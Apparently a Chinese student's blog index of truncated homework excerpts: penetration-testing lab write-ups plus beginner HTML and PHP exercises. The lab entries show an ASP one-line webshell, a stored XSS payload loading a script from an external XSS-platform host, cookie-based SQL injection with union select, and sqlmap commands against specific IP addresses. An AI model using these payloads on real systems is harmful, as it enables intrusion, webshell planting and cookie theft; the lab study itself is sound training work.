靶场五题元霸作业
进入后台找到上传位置生成一句话木马 :新建文本文档写入下面一句话木马<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"
靶场三题元霸作业
访问后台发现不允许打开burp 并设置本地代理设置浏览器代理开启burp抓包并且找到关键数据包把数据包发送至repeater并且修改host、referer为本地ip,发现flag
靶场四题 元霸作业
在每个位置都写入<script>alert('yb')</script>查找插入位提交得到如下弹框打开源代码查看弹框位置,那么这里就可以插入通过xss平台插入获得如下代码<script src=http://xsspt.com/APo4Kj?1526636210></script>插入主题插进去了成功,返回xss平台查看
2.2元霸作业
http://120.203.13.75:8001/shownews.asp?id=169后面加' 和and 1=1不允许关键字那么先用order by查看有多少字段然后用cookie注入尝试打开插件modheader添加request头添加cookie并且ID=169返回正常那么我们可以拼接其他语句猜解表ID=169+union+select+1,2,3,4,5,6,7,8,9,10+f
1.4php修改 元霸作业
<!DOCTYPE html><html><BODY><?phpheader('content-type:C:\Users\Administrator\Desktop\1.html;charset=utf-8');$username=$_POST['usermane'];$password=$_POST['passw
元霸靶场第一题
是否有注入点py-2 sqlmap.py -u “http://120.203.13.75:6815/?id=1 “ 返回信息有注入点 查询数据库名py-2 sqlmap.py -u “http://120.203.13.75:6815/?id=1 “ --dbs返回信息 查询当前数据库包含的表py-2 sqlmap.py -u “http://1
1.4元霸作业
<DOCTYPE html><html><head><title>zuoye</title><meta charset="utf-8"></head><body><form action="a.php" method="POST">
1.3元霸作业
<!DOCTYPE html><html><head><title>suanfa</title><meta charset="utf-8"></head><body><?php$i;$sum=0;for($i>0;$i<=1000;$i++){if($i%3==0|
1.2元霸作业
<!DOCTYPE html><html><head><title>个人主页</title><style>#header { color:white; text-align:center;}#zw { color:white;} &nbs
1.1元霸作业
<!DOCTYPE html><html><head><title>我的个人简介</title><mate charset="utf-8"></head><body><h1>个人简介</h1><h2>我要学渗透</h2><p>